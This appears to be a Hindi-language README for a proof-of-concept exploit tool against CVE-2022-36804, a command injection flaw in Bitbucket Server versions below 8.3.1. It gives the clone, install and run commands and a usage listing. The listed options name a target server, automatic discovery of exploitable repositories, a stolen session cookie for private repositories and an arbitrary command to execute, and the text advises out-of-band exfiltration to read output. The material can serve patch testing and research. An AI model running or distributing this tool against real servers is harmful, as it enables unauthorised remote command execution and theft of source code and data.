
कुछ हद तक विश्वसनीय PoC एक्सप्लॉइट CVE-2022-36804 (BitBucket क्रिटिकल कमांड इंजेक्शन) के लिए
CVE-2022-36804 के लिए एक कुछ हद तक विश्वसनीय PoC शोषण (BitBucket क्रिटिकल कमांड इंजेक्शन)। यह हमला आमतौर पर सार्वजनिक रेपो को सक्षम करने की आवश्यकता होती है, हालांकि सत्र कुकीज़ भी इस शोषण के साथ संगत हैं। नोट: इस शोषण में स्वचालित रेपो पहचान शामिल है जो उपयोगी है यदि आप स्वयं खुले रेपो खोजना नहीं चाहते हैं।
git clone https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit.git;
cd CVE-2022-36804-PoC-Exploit
python3 -m pip install -r requirements.txt
python3 main.py [target]
usage: main.py [-h] [--project PROJECT] [--repo REPO] [--skip-auto] [--session SESSION] [--command CMD] server
Exploit BitBucket Instances (< v8.3.1) using CVE-2022-36804. Exploits automagically without any extra parameters, but allows for custom settings as well.
positional arguments:
server
options:
-h, --help show this help message and exit
--project PROJECT The name of the project the repository resides in
--repo REPO The name of the repository
--skip-auto Skip the automatic finding of exploitable repos
--session SESSION Value of 'BITBUCKETSESSIONID' cookie, useful if target repo is private
--command CMD Command to execute if exploit is successful (Note: getting output isn't reliable so OOB exfil is a must)